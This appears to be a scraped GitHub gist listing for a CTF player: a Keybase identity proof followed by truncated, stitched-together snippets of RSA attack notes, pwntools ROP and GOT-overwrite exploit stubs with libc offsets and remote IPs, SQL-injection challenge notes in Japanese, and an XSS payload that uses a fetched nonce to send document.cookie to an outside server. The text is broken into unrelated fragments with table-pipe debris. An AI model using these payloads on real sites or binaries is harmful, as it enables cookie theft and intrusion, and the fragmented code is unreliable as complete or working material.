I hereby claim:
- I am rekkusu on github.
- I am xrekkusu (https://keybase.io/xrekkusu) on keybase.
- I have a public key ASDikKa6pgDX2d4GPEgqRbS4aQZnkti0ROig4psGPje8bAo
To claim this, I am signing this object:
# Overview | |
# This challenge is based on May's version of Wiener's Attack | |
# (https://www.math.uni-frankfurt.de/~dmst/teaching/WS2015/Vorlesung/Alex.May.pdf) | |
# But the attack can't be apply to the challenge because it has 2 exponents, | |
# so you have to extend the method of May. | |
# After LLL, choose 2 shortest vectors and reconstruct polynomial. | |
# then pick coefficients and decrypt ciphertext | |
import json | |
from binascii import unhexlify |
I hereby claim:
To claim this, I am signing this object:
<script> | |
fetch('/nonce').then(r => r.text()).then(nonce => { | |
document.write('<iframe src="http://35.187.214.138:10023/?q=<script nonce='+nonce+'>location.href=\'//[server]/flag?f=\'%2Bdocument.cookie\x3c\x2fscript>"></iframe>'); | |
}); | |
</script> |
from pwn import * | |
import string | |
strcmp_got = 0x603050 | |
free_libc = 0x222c40 | |
free_got = 0x603018 | |
strchr_libc = 0x86d40 | |
strchr_got = 0x603038 | |
#system_libc = 0x46590 | |
system_libc = 0xe5765 # One gadget RCE |
from pwn import * | |
# local libc | |
libc_data = 0x1bb000 | |
libc_main_arena = libc_data + 0x203760 | |
libc_environ = libc_data + 0x2064a0 | |
libc_gadget = { | |
'poprdi': 0x22b1a, | |
'poprsi': 0x24805, | |
'poprdx': 0x1b8e, |
[intercollege] | |
1. WebServiceX | |
記事投稿掲示板 | |
SQLi | |
パス丸見え | |
削除キーを抜き取り記事を削除する | |
2. SECCON競馬 | |
node.jsで稼働するサーバ | |
各所にあるSQLiを攻撃 |
from pwn import * | |
ret_addr = 0x8056afa | |
pop2ret = 0x80578fa | |
leaveret = 0x804889f | |
password = 0x805f0c0 | |
sock_send = 0x804884b | |
s = remote('54.152.37.20', 24242) | |
payload = [ |
from pwn import * | |
import re | |
import os | |
import time | |
import sys | |
REMOTE = len(sys.argv) >= 2 and sys.argv[1] == 'r' | |
csu_pop = 0x4008ca | |
csu_call = 0x4008b0 |
// Use Gists to store code you would like to remember later on | |
console.log(window); // log the "window" object to the console |
A = 2**127 - 1 | |
B = 2**521 - 1 | |
M = 2**607 - 1 | |
e = 2 ** 16 + 1 | |
N = 63818680202675589216815967315756339566489246779116223051722243409259352306082269405584940079271925323037734694881017657210693291225811959344097136283943773119253977386753351100049200282621303479907450098708525270143513533970091975470643256818850535284677109438825447301648598261836252545636152169068763895406856318437232759172916712871952129664784095465920918889209 | |
# Mathematica | |
# X = Mod[FindInstance[Reduce[A*x^2 + B*x - NN + k*M == 0, {x, k}, Integers], {x, k}][[1]][[1]][[2]], M] | |
X = 191381205906541365810282593776863206661156657204872893015293939948869850881931905283828875884014270971209197231695869794928684848246961454267088835714426435068255775651115299873104893 |